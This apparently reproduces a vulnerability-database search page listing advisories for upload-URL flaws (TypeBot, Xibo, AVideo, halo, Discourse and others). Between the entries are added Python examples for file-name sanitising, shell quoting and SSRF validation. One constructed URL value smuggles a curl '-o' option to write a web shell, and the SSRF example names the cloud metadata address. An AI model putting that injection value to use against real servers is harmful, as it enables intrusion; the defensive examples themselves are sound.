
28 matches found

Cvelist
added 2026/06/17 11:13 p.m., 22 views

CVE-2026-48768 TypeBot: Unauthenticated arbitrary s3 object write in generate-upload-url via unsanitized fileName

TypeBot is a chatbot builder tool. In versions 3.16.1 and earlier, POST /api/blocks/file-input/v3/generate-upload-url is unauthenticated and uses unsanitized fileName input to construct public/ S3 object keys, while issuing presigned PUT URLs that do not bind Content-Type. As a result, any...

CVSS 9.3, EPSS 0.00268
Exploits 0, References 2
CVE
added 2026/06/17 11:13 p.m., 18 views

CVE-2026-48768

TypeBot (versions ≤ 3.16.1) exposes an unauthenticated generate-upload-url API (/api/blocks/file-input/v3/generate-upload-url) that uses unsanitized fileName to derive public S3 keys and issues presigned PUT URLs that do not bind Content-Type. This allows anonymous users of a published bot with a...

CVSS 9.3, AI score 5.4, EPSS 0.00268
Exploits 0, References 2
RedhatCVE
added 2026/06/05 7:32 p.m., 10 views

CVE-2026-6344

The Fluent Forms plugin for WordPress is vulnerable to Arbitrary File Read in versions up to and including 6.2.1. This is due to insufficient path validation in the getAttachments method of EmailNotificationActions, which resolves attacker-supplied file-upload URLs into filesystem paths without...

CVSS 4.9, AI score 5.6, EPSS 0.00554
Exploits 0, References 1
Cvelist
added 2026/05/12 5:14 p.m., 43 views

CVE-2026-42141 Xibo: Authenticated Server-Side Request Forgery (SSRF) in Library Upload via URL functionality

Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.1, an authenticated Server-Side Request Forgery (SSRF) vulnerability in the Xibo CMS allows users with Library upload permissions to make arbitrary HTTP requests fr...

CVSS 7.7, EPSS 0.00369
Exploits 1, References 1
EUVD
added 2026/05/06 6:47 a.m., 8 views

EUVD-2026-27536

The Fluent Forms plugin for WordPress is vulnerable to Arbitrary File Read in versions up to and including 6.2.1. This is due to insufficient path validation in the getAttachments method of EmailNotificationActions, which resolves attacker-supplied file-upload URLs into filesystem paths without...

CVSS 4.9, AI score 5.9, EPSS 0.00554
Exploits 0, References 10
GithubExploit
added 2026/04/30 6:44 a.m., 78 views

Exploit for CVE-2026-42141

CVE-2026-42141 - Xibo CMS SSRF vulnerability in Xibo CMS...

AI score 5.4, EPSS 0.00369
Exploits 1
Cvelist
added 2026/04/17 3:30 p.m., 32 views

CVE-2026-6497 prasathmani TinyFileManager File Upload filemanager.php server-side request forgery

A vulnerability was determined in prasathmani TinyFileManager up to 2.6. Affected by this vulnerability is an unknown functionality of the file /filemanager.php?p= ajax=true&type=upload of the component File Upload Handler. This manipulation of the argument uploadurl causes server-side request...

CVSS 6.5, EPSS 0.00267
Exploits 0, References 4
Positive Technologies
added 2026/04/17 12:00 a.m., 7 views

PT-2026-33461

Name of the vulnerable software and affected versions: prasathmani TinyFileManager versions prior to 2.7. Description: An issue in the File Upload Handler component allows for server-side request forgery, a flaw where an attacker can induce the server to make requests to an unintended location. This...

CVSS 6.5, AI score 6.5, EPSS 0.00267
Exploits 0, References 7
CNNVD
added 2026/04/01 12:00 a.m., 9 views

Payload path traversal vulnerability

Payload is a headless CMS and application framework built using TypeScript, Node.js, React, and MongoDB. Versions of Payload prior to 3.78.0 contained a path traversal vulnerability. This vulnerability stemmed from the client-side upload signature URL endpoint not properly cleaning file names,...

CVSS 6.5, AI score 5.8, EPSS 0.00341
Exploits 0, References 1
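The TypeBot entry above (CVE-2026-48768) and this Payload entry describe the same defect: a client-supplied file name is used as-is to derive the object key that a signed upload URL writes to. The following is an added Python example, not code from either project, showing one way to reduce such a name to a single safe path component and place it under a server-chosen random prefix. The `public/` prefix, the helper names and the traversal inputs are assumptions constructed for the example.

```python
"""Sanitise an untrusted upload file name before it becomes an object key.

Added illustration, not TypeBot or Payload code. The "public/" prefix and the
helper names are assumptions made for the example.
"""
import posixpath
import re
import secrets
import unicodedata
from typing import Optional

_ALLOWED = re.compile(r"[^A-Za-z0-9._-]+")   # anything else becomes "_"
_MAX_NAME = 128


def sanitize_file_name(raw: str) -> str:
    """Reduce a user-supplied name to one safe path component."""
    if not isinstance(raw, str):
        raise ValueError("file name must be a string")
    name = unicodedata.normalize("NFKC", raw)
    name = "".join(ch for ch in name if ch.isprintable())   # drops NUL, CR, LF
    name = posixpath.basename(name.replace("\\", "/"))      # discard any directory part
    name = _ALLOWED.sub("_", name).strip("._")              # no leading dots, so no ".."
    if not name:
        raise ValueError("empty or reserved file name")
    return name[:_MAX_NAME]


def build_object_key(file_name: str, prefix: str = "public/",
                     token: Optional[str] = None) -> str:
    """Key = prefix + server-chosen random token + sanitised name.

    The client only ever influences the last component; it cannot pick the
    full key, so two uploads with the same name never collide or overwrite.
    """
    safe = sanitize_file_name(file_name)
    token = token or secrets.token_urlsafe(16)
    key = f"{prefix}{token}/{safe}"
    # Defence in depth: the key must still sit under the prefix.
    if not key.startswith(prefix) or ".." in key.split("/"):
        raise ValueError("object key escaped its prefix")
    return key


def vulnerable_object_key(file_name: str, prefix: str = "public/") -> str:
    """The shape the advisories describe: raw name concatenated into the key."""
    return prefix + file_name
```

The companion fix for the TypeBot case is to bind the content type when the presigned PUT is generated: check the requested type against a server-side allowlist first, then include it in the signed parameters (with boto3, `ContentType` inside `Params` for `generate_presigned_url("put_object", ...)`), so a client that changes the header at upload time fails the signature check.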
Vulnrichment
added 2026/03/22 4:29 p.m., 3 views

CVE-2026-33319 AVideo Vulnerable to OS Command Injection via Unescaped URL in LinkedIn Video Upload Shell Command

WWBN AVideo is an open source video platform. Prior to version 26.0, the uploadVideoToLinkedIn method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via escapeshellarg. If an attacke...

CVSS 5.9, AI score 6, EPSS 0.00323
Exploits 1, References 2
CVE
added 2026/03/22 4:29 p.m., 18 views

CVE-2026-33319

Summary: CVE-2026-33319 affects WWBN AVideo prior to 26.0 via the SocialMediaPublisher/SocialUploader.php. The vulnerability is an OS command injection because the code builds a shell command by concatenating an untrusted upload URL from LinkedIn’s API with a file path and passes it to exec(), wi...

CVSS 7.5, AI score 6, EPSS 0.00323
Exploits 1, References 2, Affected software 1
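The two AVideo entries above (CVE-2026-33319) describe a shell command assembled from a URL the server received in a third-party API response. The following is an added Python example, not AVideo's code, that reproduces the flaw in a simpler form: it builds the vulnerable string, shows the extra argument tokens a POSIX shell would derive when the URL carries whitespace, and beside it the quoted form (the equivalent of `escapeshellarg`) and the argument-vector form. The curl invocation, the URL and the path are constructed for the example; nothing is executed.

```python
"""Shell command built from an untrusted URL: vulnerable string vs quoted/argv.

Added illustration, not AVideo code. The curl command, the URL and the path
are constructed for the example; the demo only parses, it never executes.
"""
import shlex
from typing import Dict, List

VIDEO_PATH = "/var/www/videos/clip.mp4"                                   # constructed
# A response field that should have been a plain URL but carries extra
# whitespace-separated words. Each word becomes its own curl argument once the
# string reaches a shell; "-o" makes curl write the response to that path.
INJECTED_URL = "https://api.example.test/upload?x=1 -o /var/www/html/shell.php"  # constructed


def vulnerable_command(upload_url: str, video_path: str) -> str:
    """Pattern from the advisory: values interpolated straight into the string."""
    return f"curl -s -X PUT --upload-file {video_path} {upload_url}"


def quoted_command(upload_url: str, video_path: str) -> str:
    """Same command with every untrusted value shell-quoted."""
    return f"curl -s -X PUT --upload-file {shlex.quote(video_path)} {shlex.quote(upload_url)}"


def argv_command(upload_url: str, video_path: str) -> List[str]:
    """Preferred form: an argument vector for subprocess.run(argv, shell=False)."""
    return ["curl", "-s", "-X", "PUT", "--upload-file", video_path, upload_url]


def looks_like_upload_url(url: str) -> bool:
    """Belt and braces: the value must be a single https URL with no whitespace."""
    return url.startswith("https://") and not any(ch.isspace() for ch in url)


def analyse(upload_url: str = INJECTED_URL, video_path: str = VIDEO_PATH) -> Dict[str, object]:
    """Show the argument boundaries a POSIX shell would derive from each string."""
    vuln = shlex.split(vulnerable_command(upload_url, video_path))
    quoted = shlex.split(quoted_command(upload_url, video_path))
    return {
        "vulnerable_argv": vuln,
        "quoted_argv": quoted,
        "argv_matches_quoted": quoted == argv_command(upload_url, video_path),
        # Anything after the URL position is an option the code never wrote.
        "injected_option": "-o" in vuln[6:],
    }
```

In the vulnerable form the attacker controls curl's options as well as its target, which is how a URL field turns into a file write on the server; quoting keeps the whole value as one argument, and the argv form never goes through a shell at all.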
RedhatCVE
added 2026/01/14 11:19 p.m., 7 views

CVE-2022-50916

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to overwrite server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.ph...

CVSS 8.7, AI score 6.8, EPSS 0.00804
Exploits 1, References 1
OSV
added 2026/01/13 11:15 p.m., 3 views

CVE-2022-50916

e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to overwrite server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.ph...

CVSS 7.2, AI score 5.8, EPSS 0.00804
Exploits 1, References 4
RedhatCVE
added 2026/01/09 10:39 a.m., 7 views

CVE-2022-35246

A NoSQL-injection information disclosure vulnerability exists in Rocket.Chat...

CVSS 4.3, AI score 4.5, EPSS 0.00597
Exploits 1, References 1
RedhatCVE
added 2025/10/20 6:23 p.m., 5 views

CVE-2025-62647

The Restaurant Brands International (RBI) assistant platform through 2025-09-06 provides the functionality of returning a JWT that can be used to call an API to return a signed AWS upload URL, for any store's path...

CVSS 5.8, AI score 7, EPSS 0.00343
Exploits 1, References 1
EUVD
added 2025/10/17 12:00 a.m., 3 views

EUVD-2025-34925

The Restaurant Brands International (RBI) assistant platform through 2025-09-06 provides the functionality of returning a JWT that can be used to call an API to return a signed AWS upload URL, for any store's path...

CVSS 5.8, AI score 6.5, EPSS 0.00343
Exploits 1, References 6
EUVD
added 2025/10/03 8:07 p.m., 7 views

EUVD-2021-8679

Malicious code in bioql PyPI...

CVSS 7.7, AI score 6.7, EPSS 0.01321
Exploits 1, References 5
RedhatCVE
added 2025/09/11 12:16 a.m., 10 views

CVE-2025-44594

halo v2.20.17 and before is vulnerable to server-side request forgery (SSRF) in /apis/uc.api.storage.halo.run/v1alpha1/attachments/-/upload-from-url...

CVSS 9.1, AI score 7, EPSS 0.00348
Exploits 0, References 1
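The Xibo (CVE-2026-42141), TinyFileManager (CVE-2026-6497) and halo (CVE-2025-44594) entries above are all upload-from-URL features that fetch whatever address a user supplies. The following is an added Python example, not code from any of those projects, that validates such a URL before any request is made: scheme and port allowlist, no credentials in the URL, and every address the host resolves to must be public (including IPv4-mapped IPv6 forms). The resolver is injectable so the block runs offline against a constructed DNS table; the host names and addresses are made up for the example.

```python
"""Validate a user-supplied URL before an upload-from-URL fetch.

Added illustration, not Xibo, TinyFileManager or halo code. Host names and
addresses in CONSTRUCTED_DNS are made up so the example runs offline.
"""
import ipaddress
import socket
from typing import Callable, Iterable, List, Tuple
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]

# Ranges that is_private/is_link_local do not flag on every Python version.
_EXTRA_BLOCKED = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("100.64.0.0/10"),   # carrier-grade NAT
]


def system_resolver(host: str) -> List[str]:
    """Resolve with the OS resolver (A and AAAA); used outside the demo."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(text: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:10.0.0.1 is still 10.0.0.1
    if (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified):
        return False
    if isinstance(ip, ipaddress.IPv4Address):
        return not any(ip in net for net in _EXTRA_BLOCKED)
    return True


def validate_fetch_url(url: str, resolver: Resolver = system_resolver) -> Tuple[str, List[str]]:
    """Return (host, addresses) if the URL may be fetched, else raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http/https may be fetched")      # no file://, gopher://, ...
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    if parts.port not in (None, 80, 443):
        raise ValueError("port not in allowlist")
    try:                                   # literal address: no DNS lookup needed
        addresses = [str(ipaddress.ip_address(host))]
    except ValueError:
        addresses = list(resolver(host))
    if not addresses:
        raise ValueError("host did not resolve")
    for addr in addresses:                 # every record must be public, not just the first
        if not is_public_address(addr):
            raise ValueError(f"{host} resolves to non-public address {addr}")
    return host, addresses


def is_allowed(url: str, resolver: Resolver = system_resolver) -> bool:
    try:
        validate_fetch_url(url, resolver)
        return True
    except ValueError:
        return False


# Constructed DNS table for the offline demo; the public address is arbitrary.
CONSTRUCTED_DNS = {
    "cdn.example.test": ["51.75.1.2"],
    "meta.example.test": ["169.254.169.254"],              # cloud metadata endpoint
    "mixed.example.test": ["51.75.1.2", "10.0.0.5"],       # one private record
    "v6mapped.example.test": ["::ffff:127.0.0.1"],
}


def stub_resolver(host: str) -> List[str]:
    return CONSTRUCTED_DNS.get(host, [])
```

Two caveats remain once the URL passes: connect to the address you validated rather than resolving the name a second time (DNS rebinding), and either disable redirects or run the same validation on every hop, since a public host can 302 to an internal one.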
CNVD
added 2024/01/26 12:00 a.m., 20 views

Unspecified vulnerability in Discourse (CNVD-2024-14089)

Discourse is an open source community discussion platform. The platform includes features such as community, email and chat rooms. Discourse suffers from a security vulnerability that can be exploited by an attacker to access a secure upload URL associated with a post...

CVSS 4.3, AI score 6.9, EPSS 0.00321
Exploits 0, References 1
CNNVD
added 2024/01/12 12:00 a.m., 3 views

Discourse access control error vulnerability

Discourse is an open source community discussion platform. The platform includes features such as community, email and chat rooms. Discourse suffers from a security vulnerability that can be exploited by an attacker to access a secure upload URL associated with a post...

CVSS 4.3, AI score 6.9, EPSS 0.00321
Exploits 0, References 3